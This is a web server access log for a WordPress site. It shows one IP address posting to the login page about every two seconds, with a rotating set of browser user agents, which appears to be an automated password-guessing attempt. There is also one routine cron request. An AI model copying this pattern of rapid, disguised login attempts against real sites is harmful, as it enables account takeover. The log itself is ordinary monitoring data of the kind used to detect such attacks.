130.12.180.90 - - [11/Apr/2026:07:33:01 +0800] "POST /wp-login.php HTTP/1.1" 200 3019 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:119.0) Gecko/20100101 Firefox/119.0"
130.12.180.90 - - [11/Apr/2026:07:33:03 +0800] "POST /wp-login.php HTTP/1.1" 200 3076 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
130.12.180.90 - - [11/Apr/2026:07:33:05 +0800] "POST /wp-login.php HTTP/1.1" 200 3019 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
130.12.180.90 - - [11/Apr/2026:07:33:07 +0800] "POST /wp-login.php HTTP/1.1" 200 3078 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
36.133.115.36 - - [11/Apr/2026:07:33:09 +0800] "POST /wp-cron.php?doing_wp_cron=1775863989.6521329879760742187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
130.12.180.90 - - [11/Apr/2026:07:33:09 +0800] "POST /wp-login.php HTTP/1.1" 200 3072 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0"
130.12.180.90 - - [11/Apr/2026:07:33:11 +0800] "POST /wp-login.php HTTP/1.1" 200 3079 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
130.12.180.90 - - [11/Apr/2026:07:33:13 +0800] "POST /wp-login.php HTTP/1.1" 200 3076 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0"
130.12.180.90 - - [11/Apr/2026:07:33:16 +0800] "POST /wp-login.php HTTP/1.1" 200 3080 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
130.12.180.90 - - [11/Apr/2026:07:33:18 +0800] "POST /wp-login.php HTTP/1.1" 200 3076 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
130.12.180.90 - - [11/Apr/2026:07:33:20 +0800] "POST /wp-login.php HTTP/1.1" 200 3074 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
130.12.180.90 - - [11/Apr/2026:07:33:22 +0800] "POST /wp-login.php HTTP/1.1" 200 3073 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0"
130.12.180.90 - - [11/Apr/2026:07:33:24 +0800] "POST /wp-login.php HTTP/1.1" 200 3072 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
130.12.180.90 - - [11/Apr/2026:07:33:26 +0800] "POST /wp-login.php HTTP/1.1" 200 3071 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
130.12.180.90 - - [11/Apr/2026:07:33:28 +0800] "POST /wp-login.php HTTP/1.1" 200 3071 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0"
